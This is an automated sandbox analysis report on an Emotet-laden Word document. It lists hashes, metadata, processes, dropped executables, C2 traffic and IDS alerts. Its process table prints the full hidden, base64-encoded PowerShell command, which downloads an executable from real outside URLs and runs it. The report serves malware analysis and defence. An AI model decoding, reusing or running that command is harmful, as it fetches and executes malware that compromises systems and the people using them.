File name: | 4.doc |
Full analysis: | https://app.any.run/tasks/7d3e5961-3987-44a1-ab7e-fcb99380ec38 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 18, 2020, 09:49:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Accusamus., Author: Louise Lucas, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 07:06:00 2020, Last Saved Time/Date: Fri Jan 17 07:06:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | B46CAF1002548C119670DB682321901B |
SHA1: | D85BBF7B9DF46F849B61586FC2B3BAE735D69B0C |
SHA256: | 7BB5FDC2F055E22227B6471AA23EA22C95FA0235BC96BB40893513D1FC6E6D76 |
SSDEEP: | 6144:K70Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+FCJuvvwJ:W0E3dxtR/iU9mvUPHvwJ |
.doc | | | Microsoft Word document (80) |
---|
Title: | Accusamus. |
---|---|
Subject: | - |
Author: | Louise Lucas |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:01:17 07:06:00 |
ModifyDate: | 2020:01:17 07:06:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 26 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2752 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3876 | Powershell -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcABzAGUAYwBxAGYAJwA7ACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAeQBtAGIAaAB5AGUAeABtAGgAKwAnAC4AZQB4AGUAJwA7ACQAUQBlAGUAdwBsAG8AaAB2AG4AaAB6AGoAZwA9ACcAVABxAHkAdABqAHgAaQB0AG8AZAB4AHoAZgAnADsAJABQAHYAcQBrAHIAbgBvAGEAbwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAEwASQBFAG4AdAA7ACQARgBrAG0AbgBnAGkAdABnAGEAPQAnAGgAdAB0AHAAOgAvAC8AbwBuAGkAbwBuAGcAYQBtAGUAcwAuAGoAcAAvAGMAbwBuAHQAYQBjAHQALwBpAFkALwAqAGgAdAB0AHAAOgAvAC8AcABtAHQAaABvAG0AZQAuAGMAbwBtAC8AcABvAHMAdABhAC8AZAByADMAegB4AGEALwAqAGgAdAB0AHAAOgAvAC8AdQByAGcAZQB2AGUAbgB0AGEALgBlAHMALwBpAG0AZwAvAGsAMwA1AGQAOQBxAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBvAGwAbQBlAGMALgBjAG8AbQAuAGEAcgAvAHMAaQB0AGkAbwAvAG4AVABYAFoAbwBtAEsAQwB4AC8AKgBoAHQAdABwAHMAOgAvAC8AdABpAGEAZwBvAGMAYQBtAGIAYQByAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBzADkANgAvACcALgAiAFMAcABMAGAASQBUACIAKAAnACoAJwApADsAJABYAG0AdgB0AHMAZgBmAGoAZgBqAD0AJwBOAGIAcwBmAHYAYQB2AGsAbQBzAGwAYgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQB0AHkAawBtAGcAcAB5AHkAYwB6AHkAIABpAG4AIAAkAEYAawBtAG4AZwBpAHQAZwBhACkAewB0AHIAeQB7ACQAUAB2AHEAawByAG4AbwBhAG8ALgAiAGQAYABPAFcAbgBsAG8AYQBgAEQAZgBJAGwARQAiACgAJABRAHQAeQBrAG0AZwBwAHkAeQBjAHoAeQAsACAAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABMAHEAcwBuAG8AYwBpAGMAawA9ACcATQB3AHIAbgBoAHMAawB6AGUAdQBzACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAKQAuACIAbABgAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMANgA5ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAdAAiACgAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABaAGoAYwB5AGUAYgB0AHUAPQAnAFAAcQByAHYAaABrAGwAcQBlAHIAaQBlACcAOwBiAHIAZQBhAGsAOwAkAEYAegBiAGIAdQBuAHQAdQB1AGwAcABzAGcAPQAnAE0AdQBzAG0AeAB4AHEAYgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAYgByAGgAdAB2AGcAZgB0AGYAegBzAD0AJwBCAHYAdgBnAGcAcABkAGkAawBzAHcAcQByACcA | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2892 | "C:\Users\admin\593.exe" | C:\Users\admin\593.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Description: Application MFC DShowEncoder Exit code: 0 Version: 1, 0, 0, 76 | ||||
3640 | --6b95206d | C:\Users\admin\593.exe | 593.exe | |
User: admin Integrity Level: MEDIUM Description: Application MFC DShowEncoder Exit code: 0 Version: 1, 0, 0, 76 | ||||
3768 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 593.exe |
User: admin Integrity Level: MEDIUM Description: Application MFC DShowEncoder Exit code: 0 Version: 1, 0, 0, 76 | ||||
2088 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: Application MFC DShowEncoder Version: 1, 0, 0, 76 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2752 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9A56.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2752 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF05EE52A17A0110F5.TMP | — | |
MD5:— | SHA256:— | |||
3876 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IM4WCBU1K7TDN356UKZ3.temp | — | |
MD5:— | SHA256:— | |||
2752 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:BD161F49762E5386B9B1FA19D898CA98 | SHA256:E0006BE9D83457D20AA26637906893193586291EF30EAE73C6F20B8B0D839E99 | |||
2752 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8B378DCC62035BBABEF8B1C2A131A338 | SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 | |||
3876 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a42a.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3876 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3640 | 593.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | |
MD5:22A610B86A5FF48DCA872288FA4C25ED | SHA256:FA864DFFC838C34CC77476AFEC81A66ACF6320B1DA42A5773F363591E6D8C653 | |||
3876 | Powershell.exe | C:\Users\admin\593.exe | executable | |
MD5:22A610B86A5FF48DCA872288FA4C25ED | SHA256:FA864DFFC838C34CC77476AFEC81A66ACF6320B1DA42A5773F363591E6D8C653 | |||
2752 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$4.doc | pgc | |
MD5:E3AD579CC64E829D970D6D294E4A1A63 | SHA256:44251251EDC0AA6350DABD5E993DBC1ED11E2B30E18D3F73833E2FCFB2DDA41E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2088 | serialfunc.exe | POST | 200 | 100.6.23.40:80 | http://100.6.23.40/excIwlVPUqj | US | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3876 | Powershell.exe | 210.224.185.151:80 | oniongames.jp | SAKURA Internet Inc. | JP | suspicious |
2088 | serialfunc.exe | 100.6.23.40:80 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
Domain | IP | Reputation |
---|---|---|
oniongames.jp |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3876 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3876 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3876 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2088 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
2088 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
2088 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |